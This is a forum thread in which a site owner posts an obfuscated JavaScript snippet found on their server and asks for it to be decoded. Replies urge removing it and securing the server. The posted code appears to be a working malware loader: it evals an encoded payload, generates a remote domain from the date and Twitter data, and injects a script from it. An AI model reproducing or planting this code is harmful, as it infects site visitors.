Current location: Hot Scripts Forums » General Web Coding » JavaScript » Possible Javascript Threat

Possible Javascript Threat

Reply
 
LinkBack Thread Tools Display Modes
  #1 (permalink)  
Old 11-09-09, 07:04 AM
pretino pretino is offline
New Member
  
Join Date: Nov 2009
Posts: 2
Thanks: 0
Thanked 0 Times in 0 Posts
Possible Javascript Threat
Can you please help me on decoding the following javascript.
What does it actually do ?
HTML Code:
<script language="javascript">$a="Z63cZ3dZ22ds.leZ256eZ2567tZ2568;i+Z252b)Z257btmpZ253dds.Z2573licZ2565(i,Z2569Z252b1)Z22;stZ3dZ22Z2573Z2574Z253dZ2522$Z2561Z253dsZ2574;Z2564cZ2573(Z2564aZ252bZ2564Z2562+Z2564cZ252bdZ2564Z252bZ2564eZ252c1Z2530Z2529;Z2564Z2577(Z2573tZ2529Z253bsZ2574Z253d$aZ253bZ2522;Z22;cbZ3dZ22apZ2565Z2528dZ2573Z2529;Z2573tZ253dtmZ2570Z253dZ2527Z2527;for(iZ253d0;Z2569Z253cZ22;dbZ3dZ229+tqduZ3ecudTqdu8tqduZ3ewudTqdu890Z3d0#9+0dy}uK7iuqb7M0-0tqduZ3ewudVe||Iuqb89+dy}uK7}Z257F~dx7M0-0tqduZ3ewud]Z257F~dx89;!+dy}uK7tqi7M0-0tqduZ3ewudTqdu89+yv08tqduZ3ewudTqi890--0!0ll0tqduZ3ewudTqi890--0Z25260ll0tqduZ3ewudTqi890--0$9ktqduZ3ecudTqdu8tqduZ3ewudTqdu890Z3d0!9+0dy}uK7tqi7M0-0tqduZ3ewudTqdu89+0dy}uK7}Z257F~dx7M0-0tqduZ3ewud]Z257F~dx89;!+0dy}uK7iuqb7M0-0tqduZ3ewudVe||Iuqb89+0m0tqduZ3ecudTqdu8tqduZ3ewudTqdu890;Z22;dcZ3dZ220!9+0yv08tqduZ3ewud]Z257F~dx89;!0,0!Z25209kcxyvdY~tuh0-0dy}uK7iuqb7M0;07Z3dZ252070;08tqduZ3ewud]Z257F~dx89;!90+mu|cukcxyvdY~tuh0-0dy}uK7iuqb7M0;07Z3d70;08tqduZ3ewud]Z257F~dx89;!9+myv08tqduZ3ewudTqdu890;!0,0!Z25209kcxyvdY~tuh0-cxyvdY~tuh0;07Z3dZ252070;0tqduZ3ewudTqdu89+mu|cukcxyvdY~tuh0-0cxyvdY~tuh0;07Z3d70;0tqduZ3ewudTqdu89+mcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKcxyvdY~tuhMKZ2520MZ3eaeubiZ3esxqbSZ257FtuQd8!9+ve~sdyZ257F~0SZ22;opZ3dZ22Z2524aZ253dZ2522dw(Z2564cs(Z2563u,Z25314Z2529Z2529;Z2522;Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;ubZ7bfdZ25;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;dzZ3dZ22Z2566unZ2563tZ2569on Z2564wZ2528t)Z257bcZ2561Z253dZ2527Z252564Z25256fcuZ256dZ252565nt.Z252577riZ2574Z25256Z2535Z252528Z252522Z2527;ceZ253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscrZ25256Z2539pZ2574Z252520Z256cZ2561Z25256eZ2567uZ252561Z2567Z252565Z25253dZ25255cZ252522jaZ2576Z252561Z252573Z2563Z252572Z252569pZ25257Z2534Z25255Z2563Z252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscriZ2570Z252574Z25253eZ2527;eZ2576alZ2528uZ256eesZ2563apeZ2528t))Z257d;Z22;deZ3dZ22iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+4q-4qZ3ebu`|qsu8tZ3ciuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+Z22;ddZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+mfqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0}qwys^e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z22;ceZ3dZ22Z2563harZ2543oZ2564Z2565At(Z2530)Z255e(Z25270Z257800Z2527+esZ2529))Z253bZ257d}Z22;cdZ3dZ22;Z2573tZ253dZ2573Z2574+Z2553triZ256eg.fZ2572omCZ2568arCZ256fdZ2565((Z2574mp.Z22;czZ3dZ22Z2566Z2575Z256ectiZ256fn cZ257aZ2528cZ257a)Z257brZ2565tuZ2572n Z2563aZ252bZ2563Z2562+Z2563c+cZ2564+cZ2565Z252bcz;Z257dZ253bZ22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7y7Z3c7z7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+fqb0dy}u0-0~ug0Qbbqi89+fqb0tqdu0-0~ug0Tqdu8Z22;caZ3dZ22Z2566uZ256ecZ2574ioZ256eZ2520Z2564cZ2573(dsZ252cZ2565sZ2529Z257bdsZ253dunesZ2563Z22;Z69fZ20(doZ63umZ65ntZ2eZ63oZ6fZ6bieZ2einZ64exZ4fZ66(Z27rfZ35f6Z64Z73Z27)Z3dZ3d-1)Z7bfuncZ74ioZ6e cZ61llZ62aZ63k(Z78)Z7b wiZ6edowZ2etw Z3dZ20xZ3bZ73Z63(Z27rf5fZ36dZ73Z27,2,7)Z3beZ76al(Z75nZ65scaZ70e(dZ7a+Z63Z7a+opZ2bsZ74)Z2bZ27Z64wZ28dzZ2bZ63z(Z24aZ2bsZ74)Z29Z3bZ27);Z64oZ63umeZ6eZ74Z2ewZ72Z69Z74eZ28Z24a);Z7ddZ6fZ63Z75mZ65ntZ2ewriZ74e(Z22Z3cimg sZ72cZ3dZ27http:Z2fZ2fsearcZ68.Z74witZ74erZ2ecoZ6dZ2fimageZ73Z2fsearcZ68Z2frss.pZ6egZ27 widtZ68Z3d1 hZ65Z69gZ68tZ3d1 Z73tyZ6ceZ3dZ27visibiZ6cityZ3ahidZ64eZ6eZ27 Z2fZ3e Z3cscZ72Z22+Z22ipt lZ61nguZ61geZ3djaZ76aZ73crZ69ptZ22+Z22 srcZ3dZ27hZ74tZ70:Z2fZ2fseZ61rchZ2eZ74wiZ74tZ65r.Z63Z6fZ6dZ2ftrendsZ2fZ77Z65Z65kZ6cZ79.jZ73Z6fnZ3fcalZ6cbaZ63Z6bZ3dcallbZ61ck&Z65xZ63ludZ65Z3dZ68asZ68tagZ73Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}elseZ7b$aZ3dZ27Z27};fuZ6ectiZ6fn sZ63Z28cnmZ2cv,Z65d)Z7bvZ61Z72Z20exZ64Z3dnew DZ61Z74Z65();Z65Z78Z64Z2esZ65tDaZ74Z65(eZ78Z64.gZ65tDaZ74Z65()Z2bedZ29;Z64oZ63uZ6dZ65ntZ2eZ63oZ6fkieZ3dcnmZ2bZ20Z27Z3dZ27 +escape(Z76)+Z27Z3bZ65Z78Z70irZ65sZ3dZ27+exdZ2etZ6fGMTZ53Z74rZ69nZ67Z28)Z3bZ7d;";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));</script></body>
Thanks
Last edited by pretino; 11-09-09 at 07:08 AM.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Share on FacebookShare on Stumble UponShare on Twitter
Reply With Quote
  #2 (permalink)  
Old 11-09-09, 07:07 AM
wirehopper's Avatar
wirehopper wirehopper is offline
Community Liaison
  
Join Date: Feb 2006
Posts: 1,563
Thanks: 2
Thanked 25 Times in 25 Posts
Don't bother decoding it.

Get it off your server.

Check the server carefully for other instances. Upgrade any software - like blogs. Change all your passwords. Run a deep scan on your PC for viruses and malware.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Share on FacebookShare on Stumble UponShare on Twitter
Reply With Quote
  #3 (permalink)  
Old 11-09-09, 07:09 AM
pretino pretino is offline
New Member
  
Join Date: Nov 2009
Posts: 2
Thanks: 0
Thanked 0 Times in 0 Posts
ok, but I want to decode it!!!!
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Share on FacebookShare on Stumble UponShare on Twitter
Reply With Quote
  #4 (permalink)  
Old 11-09-09, 09:12 AM
End User's Avatar
End User End User is offline
Level II Curmudgeon
  
Join Date: Dec 2004
Posts: 2,838
Thanks: 13
Thanked 11 Times in 10 Posts
Quote:
Originally Posted by pretino View Post
ok, but I want to decode it!!!!
You can decode it all you want, but follow wirehopper's advice first: get rid of it as quickly as you can.

Right now you have no idea what it's doing- it may be sending spam, attacking other sites, serving up malware and/or child porn...it could be doing any or all of the above. Get rid of it first, then decode it.
__________________
I don't live on the edge, but sometimes I go there to visit.
-------------------------------------------------------------------------
Sanitize Your Data (scroll down)
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Share on FacebookShare on Stumble UponShare on Twitter
Reply With Quote
  #5 (permalink)  
Old 11-09-09, 07:18 AM
wirehopper's Avatar
wirehopper wirehopper is offline
Community Liaison
  
Join Date: Feb 2006
Posts: 1,563
Thanks: 2
Thanked 25 Times in 25 Posts
You can use PHP's eval statement to decode it.

It probably redirects to a server other than yours, or it may be attacking another server.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Share on FacebookShare on Stumble UponShare on Twitter
Reply With Quote
  #6 (permalink)  
Old 11-09-09, 09:39 AM
Nico's Avatar
Nico Nico is offline
Community Leader
  
Join Date: Sep 2005
Location: Spain
Posts: 7,536
Thanks: 5
Thanked 20 Times in 18 Posts
I tried to decode it by replacing eval() with document.write(), and AVG recognizes it as virus and won't even let me open the file.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Share on FacebookShare on Stumble UponShare on Twitter
Reply With Quote
Reply

Bookmarks

« onclick start animated gif | Which JavaScript editor do you use? »

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes
Hybrid Mode Hybrid Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
glorified disjointed rollovers with javascript asinausk JavaScript 0 09-01-09 10:50 PM
Add to timer without Javascript? PopSmith Script Requests 2 05-14-09 10:11 PM
Add javascript after load? <?Wille?> JavaScript 14 03-31-06 05:52 AM
Reaaly stuck about javascript over frames muratisik JavaScript 1 12-14-03 12:58 PM


All times are GMT -5. The time now is 10:42 PM.
vBulletin® Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
CakePHP: the rapid development php framework